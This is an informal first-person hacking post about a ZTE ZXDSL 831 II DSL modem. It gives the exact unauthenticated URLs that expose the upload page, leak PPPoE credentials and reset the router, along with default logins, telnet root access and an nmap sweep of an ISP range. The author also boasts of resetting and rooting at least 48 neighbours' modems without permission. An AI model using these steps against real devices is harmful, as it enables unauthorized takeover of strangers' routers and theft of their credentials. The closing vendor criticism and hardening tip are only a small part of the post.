Here is how it started, I got a new DSL internet modem (ZTE ZXDSL 831 II) and turns out i forgot my password. i coudnt connect to the internet nor can i go to 192.168.1.1 and change my credentials (it was using a Basic form of authentication using HTTP Headers (Could easily be exploited)) but i take it as a challenge and try to get inside to continue using my internet.
Turns out, I was able to first hack it, root it, hack the people around me (* people using broadband in the country (if know ip range)) and then write about it.
Since I wasn't able to find a direct way to access the modem directly using the IP, i start requesting some files.... and turns out most of those files were returning to me without a 401 Unauthorized error (unlike the login page), which is an Insecure Direct Object Reference vul.
note that (by default), the modem comes with admin:admin password credentials. which is awesome to pawn other people not changing the default credentials. unlike those people, i changed it, so i had to find another way.
requesting http://192.168.1.1/upload.cgi didn't throw up a 401 error. it just give the upload page, Insecure Direct Object Reference. awesome!
Next, i found the awesome place, (without being authenticated), requesting http://192.168.1.1/pppoe.cgi would turn out the pppoe password and username when you view source. shit!
Awesome! so i get inside. but that wasn't enough nomore, i wanted something more. root?
So i port scanned it using nmap -sV 192.168.1.1 and it retured
23/tcp open telnet ZXDSL 831CII ADSL modem telnetd 5.2.0a_E09_ET
so i just did telnet, since i reset default, the login now is admin:admin obviously. so i get inside the modum and get plenty of commands avilable. but they werent cool so i typed "sh" which turns out BusyBox v1.0 Built in shell(since it was running micro_httpd)
# cat /proc/cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 239.20
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
unaligned access : 1289794
VCED exceptions : not available
VCEI exceptions : not available
So I did, "cat /proc/meminfo" (6MB it holds), then "cat /proc/version" and it returned
Linux version 126.96.36.199 (email@example.com)
Even though there was a public local exploit to that kernel simply typing "echo $USER" revealed i am root. (was root the whole time) no need to root shit. Simple as that.
going to, http://192.168.1.1/menu_status.html gives public ip address of the modum. (aside from lots of easier ways), it was 10.136.0.16
so i just did a "sudo nmap --open -sS -sV -T4 10.136.0.*/24 -p 80 -oG - | grep 'open' "
and figure out atleast 48 other modums online. then i go to their ip.add.re.ss/resetrouter.cgi and then telnet. root them! it was a fun time of recovery! now i root the router, i can manipulate what goes to my ISP and what isn't which is bad for the ISP. :P
Conclusion: ZTE makes bad routers, most running same services, similar holes. it wasnt built in having security in mind. run if you see one! dont buy it! sue me!
and ya, disable remote logins to telnet, http etc. ;)